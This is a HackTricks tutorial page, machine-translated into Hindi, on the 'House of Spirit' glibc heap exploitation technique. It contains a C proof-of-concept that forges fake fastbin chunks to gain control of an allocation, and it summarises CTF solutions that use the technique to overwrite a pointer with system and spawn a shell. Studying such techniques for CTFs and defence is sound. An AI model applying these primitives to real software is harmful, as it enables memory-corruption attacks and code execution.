# House of Spirit
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
## Basic Information
### Code
House of Spirit
```c
#include
#include
#include
#include
// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit
struct fast_chunk {
size_t prev_size;
size_t size;
struct fast_chunk *fd;
struct fast_chunk *bk;
char buf[0x20]; // chunk falls in fastbin size range
};
int main() {
struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory
void *ptr, *victim;
ptr = malloc(0x30);
printf("Original alloc address: %p\n", ptr);
printf("Main fake chunk:%p\n", &fake_chunks[0]);
printf("Second fake chunk for size: %p\n", &fake_chunks[1]);
// Passes size check of "free(): invalid size"
fake_chunks[0].size = sizeof(struct fast_chunk);
// Passes "free(): invalid next size (fast)"
fake_chunks[1].size = sizeof(struct fast_chunk);
// Attacker overwrites a pointer that is about to be 'freed'
// Point to .fd as it's the start of the content of the chunk
ptr = (void *)&fake_chunks[0].fd;
free(ptr);
victim = malloc(0x30);
printf("Victim: %p\n", victim);
return 0;
}
```
### लक्ष्य
* एक पता जोड़ने में सक्षम होना ताकि बाद में इसे आवंटित किया जा सके
### आवश्यकताएं
* इस हमले के लिए हमलावर को कुछ नकली त्वरित टुकड़ों को बना सकने की आवश्यकता होती है जो सही आकार मान को सूचित करते हैं और फिर पहले नकली टुकड़ा मुक्त करने की क्षमता होनी चाहिए ताकि यह बिन में पहुंच जाए।
### हमला
* सुरक्षा जांचों को छलना करने वाले नकली टुकड़े बनाएं: आपको मुख्य रूप से सही स्थानों पर सही आकार दिखाने वाले 2 नकली टुकड़े बनाने की आवश्यकता होगी
* किसी तरह से पहले नकली टुकड़ा मुक्त करने की प्रबंधन करें ताकि यह त्वरित या टीकैच बिन में पहुंच जाए और फिर इसे उस पते को अधिग्रहण करने के लिए आवंटित किया जा सके
**कोड** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house\_of\_spirit/house\_spirit\_exp/index.html) **से बहुत अच्छा है हमले को समझने के लिए।** हालांकि कोड से यह छायांक इसे अच्छी तरह से सारांशित करता है:
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64
+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content | 0x00 |
+-------+---------------------+------+
for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/
```
{% hint style="info" %}
नोट करें कि कुछ सैनिटी चेक्स को बाईपास करने के लिए दूसरे चंक को बनाना आवश्यक है।
{% endhint %}
## उदाहरण
* **CTF** [**https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html**](https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html)
* **Libc infoleak**: एक ओवरफ्लो के माध्यम से एक पॉइंटर को बदलकर एक GOT पता करने के लिए एक libc पता लीक किया जा सकता है CTF के read क्रिया के माध्यम से
* **House of Spirit**: "राइफल" की संख्या को गिनने वाले एक काउंटर का दुरुपयोग करके पहले नकली चंक का एक नकली आकार उत्पन्न किया जा सकता है, फिर "संदेश" का दुरुपयोग करके एक चंक के दूसरे आकार को नकली किया जा सकता है और अंततः एक ओवरफ्लो का दुरुपयोग करके एक पॉइंटर को बदलना संभव है जो मुक्त किया जाएगा ताकि हमारा पहला नकली चंक मुक्त हो जाए। फिर, हम इसे आवंटित कर सकते हैं और इसके अंदर "संदेश" को कहां स्टोर किया गया है, वहां होगा। फिर, इसे `scanf` प्रविष्टि के अंदर स्टोर किया गया है, ताकि हम इसे सिस्टम के पते के साथ ओवरराइट कर सकें।\
अगली बार `scanf` को कॉल किया जाता है, हम इनपुट `"/bin/sh"` भेज सकते हैं और एक शेल प्राप्त कर सकते हैं।
* [**Gloater. HTB Cyber Apocalypse CTF 2024**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/gloater/)
* **Glibc leak**: अनइनिशियलाइज्ड स्टैक बफर।
* **House of Spirit**: हम एक ही बाइट संशोधन के साथ हीप पॉइंटर्स के एक ग्लोबल एरे का पहला सूचक संशोधित कर सकते हैं। एक नकली चंक पर `free` का उपयोग करते हुए, हम एक वैध चंक के अंदर एक नकली चंक पर उपयोग करते हैं, ताकि हम फिर से आवंटित करने के बाद चंक्स का ओवरलैपिंग स्थिति प्राप्त करें। उसके साथ, एक सरल Tcache पॉइजनिंग हमला काम करता है एक अर्बिट्रे राइट प्राइमिटिव प्राप्त करने के लिए।
## संदर्भ
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit)
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks** को **PDF** में डाउनलोड करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें** हैकिंग ट्रिक्स को **HackTricks** और **HackTricks Cloud** github रेपो में PR जमा करके।